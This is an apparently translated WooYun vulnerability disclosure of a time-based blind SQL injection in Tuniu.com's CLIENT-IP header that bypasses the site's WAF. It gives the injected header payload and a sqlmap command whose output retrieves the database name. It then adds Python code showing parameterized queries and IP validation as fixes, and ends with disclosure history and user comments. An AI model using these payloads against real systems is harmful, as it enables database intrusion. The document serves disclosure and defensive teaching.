Tuniu.com main site SQL time-based blind injection + WAF bypass

ID: 122321
URL: http://www.wooyun.org/bug.php?action=view&id=122321
Vulnerability status: confirmed by vendor
Title: Tuniu.com main site SQL time-based blind injection + WAF bypass
Vulnerability type: SQL injection
Vendor: 途牛旅游网 (Tuniu.com)
White hat: Jannock
Submitted: 2015-06-23 17:29:00
Published: 2015-08-07 17:54:00
Fix time: (not set)
Confirmed: 2015-06-23 00:00:00
Confirm Spend: 0
Tags: php, string-type injection
Followers: 0
Favorites: 0
White hat rating
White hat self-assessed rank: 20
Vendor rating
Vendor rank: 20
Summary
Tuniu.com main site SQL time-based blind injection + WAF bypass.
PS: the WAF keeps getting more and more ridiculous.
Details

GET /Partner_redirect.php HTTP/1.1
Host: www.tuniu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
CLIENT-IP: 127.0.0.1'+if((1=1 * ),(select 1 from information_schema.tables),(select 1 from information_schema.tables))+'
Content-Length: 0
Connection: close

POC

python sqlmap.py -r 1.txt --dbms=mysql --technique=T --current-db
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 17:18:43
[17:18:43] [INFO] parsing HTTP request from '1.txt'
custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] y
[17:18:44] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.tuniu.com'. Do you want to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) HEADER
Parameter: CLIENT-IP #1*
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: 127.0.0.1'+if((1=1 ) AND SLEEP(5) AND (4256=4256 ),(select 1 from information_schema.tables),(select 1 from information_schema.tables))+'
---
[17:18:50] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[17:19:03] [INFO] confirming MySQL
[17:19:03] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[17:19:13] [INFO] adjusting time delay to 1 second due to good response times
[17:19:13] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[17:19:13] [INFO] fetching current database
[17:19:13] [INFO] retrieved: tuniu
current database: 'tuniu'


[Screenshot: 1.png]

Fix

Filter the input.
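The report's injection point is the CLIENT-IP request header, which the WAF evidently did not inspect, and the suggested fix is input filtering. The example below is added here and is not code from the report or from Tuniu: it shows the vulnerable pattern (header value concatenated into SQL text) next to two defensive layers, a strict IP-address allow-list check on the header and a parameterized query, and a small log-triage helper that flags header values failing that check. The `redirect_log` table, its columns and the in-memory SQLite database are assumptions standing in for the MySQL backend; the only value taken from the report is the CLIENT-IP payload.

```python
import ipaddress
import sqlite3

# Header value from the report (copied as data, never executed here) and a benign value.
INJECTED_HEADER = ("127.0.0.1'+if((1=1 * ),(select 1 from information_schema.tables),"
                   "(select 1 from information_schema.tables))+'")
BENIGN_HEADER = "127.0.0.1"


def build_query_unsafe(client_ip: str) -> str:
    """Vulnerable pattern: the header is spliced into the SQL string.
    The single quote in the payload closes the literal early. Returned only
    so the break-out is visible; this function never touches a database."""
    return "SELECT partner_id FROM redirect_log WHERE client_ip = '" + client_ip + "'"


def validate_client_ip(value: str) -> str:
    """Allow-list check: the header must parse as an IPv4/IPv6 address.
    Anything else (SQL, quotes, spaces) is rejected before reaching the query."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        raise ValueError("CLIENT-IP header is not an IP address")


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the MySQL table (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE redirect_log (client_ip TEXT, partner_id INTEGER)")
    conn.executemany("INSERT INTO redirect_log VALUES (?, ?)",
                     [("127.0.0.1", 42), ("10.0.0.5", 7)])
    return conn


def lookup_parameterized_only(conn: sqlite3.Connection, header_value: str):
    """Parameterized query with no validation: the raw header is bound as data,
    so the payload is just a string that matches no row (returns None)."""
    row = conn.execute("SELECT partner_id FROM redirect_log WHERE client_ip = ?",
                       (header_value,)).fetchone()
    return row[0] if row else None


def lookup_partner_safe(conn: sqlite3.Connection, header_value: str):
    """Both layers: reject non-IP headers, then bind the value as a parameter."""
    ip = validate_client_ip(header_value)
    return lookup_parameterized_only(conn, ip)


def header_is_suspicious(value: str) -> bool:
    """Triage helper for access logs or a custom WAF rule on headers the main
    WAF skips: True when the CLIENT-IP value is not a plain IP address."""
    try:
        validate_client_ip(value)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print(build_query_unsafe(INJECTED_HEADER))
    db = make_db()
    print("parameterized only:", lookup_parameterized_only(db, INJECTED_HEADER))
    print("safe lookup, benign:", lookup_partner_safe(db, BENIGN_HEADER))
    print("suspicious?", header_is_suspicious(INJECTED_HEADER))
```

Two design points: the CLIENT-IP (and X-Forwarded-For) header is fully attacker-controlled, so even a non-injectable application should only honour it behind a known proxy and should still write the socket address to its logs; and the parameterized query neutralizes the payload on its own, so validation is a second layer rather than a substitute for it, which is why relying on the perimeter WAF alone failed here.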

Status history: 2015-06-23: Details sent to the vendor, awaiting vendor handling
2015-06-23: Vendor confirmed; details disclosed to the vendor only
2015-07-03: Details disclosed to core white hats and relevant domain experts
2015-07-13: Details disclosed to regular white hats
2015-07-23: Details disclosed to intern white hats
2015-08-07: Details disclosed to the public
Vendor reply: Thanks 一哥 for keeping an eye on Tuniu security, we are fixing it urgently, nothing more to say..
Response info: Severity: High; Vulnerability rank: 20; Confirmed: 2015-06-23 17:53
Comments (commenter, likes, time)

@途牛旅游网 That big "(WooYun vendor)" after your name gives away that you're one and the same person, split personality for sure... the vendor must have found it couldn't delete the reply and... @DloveJ

鹤冲天, 0 likes, 2015-08-07 18:53:00

Still not going public so we can have a look?

D_in, 0 likes, 2015-07-09 11:35:00

Hope it's not a duplicate

feng, 0 likes, 2015-06-24 07:36:00

@途牛旅游网 Where did this monkey come from, daring to impersonate me

0c0c0f, 0 likes, 2015-06-23 21:58:00

@途牛旅游网 Definitely a split personality

子非海绵宝宝, 0 likes, 2015-06-23 20:51:00

@途牛旅游网 Aren't you all the same person?

DloveJ, 0 likes, 2015-06-23 20:24:00

@途牛旅游网 Where did this monkey come from, daring to impersonate me

Mr.R, 0 likes, 2015-06-23 20:13:00

@途牛旅游网 Where did this monkey come from, daring to impersonate me!

hkAssassin, 0 likes, 2015-06-23 18:20:00

@途牛旅游网 Where did this monkey come from, daring to impersonate me!

途牛旅游网, 0 likes, 2015-06-23 17:57:00

一哥 is awesome!

qhwlpg, 0 likes, 2015-06-23 17:54:00

一哥 rocks

爱上平顶山, 0 likes, 2015-06-23 17:44:00

Patching them one by one

scanf, 0 likes, 2015-06-23 17:41:00

一哥 don't forget me, I've washed up and I'm waiting for you! (✿◡‿◡)

途牛旅游网, 0 likes, 2015-06-23 17:37:00

@途牛旅游网 Haha, all dignity gone.

紫霞仙子, 0 likes, 2015-06-23 17:37:00

It's just a question of whether you feel like posting it

scanf, 0 likes, 2015-06-23 17:35:00

+1 for 一哥

luwikes, 0 likes, 2015-06-23 17:35:00

A while back all the big vendors got a visit from 一哥, and 一哥 said he would get to them one by one.

梧桐雨, 0 likes, 2015-06-23 17:35:00

Following, 一哥's injection

D_in, 0 likes, 2015-06-23 17:35:00

一哥 rocks

浩天, 0 likes, 2015-06-23 17:31:00

Hahaha, following

疯子, 0 likes, 2015-06-23 17:31:00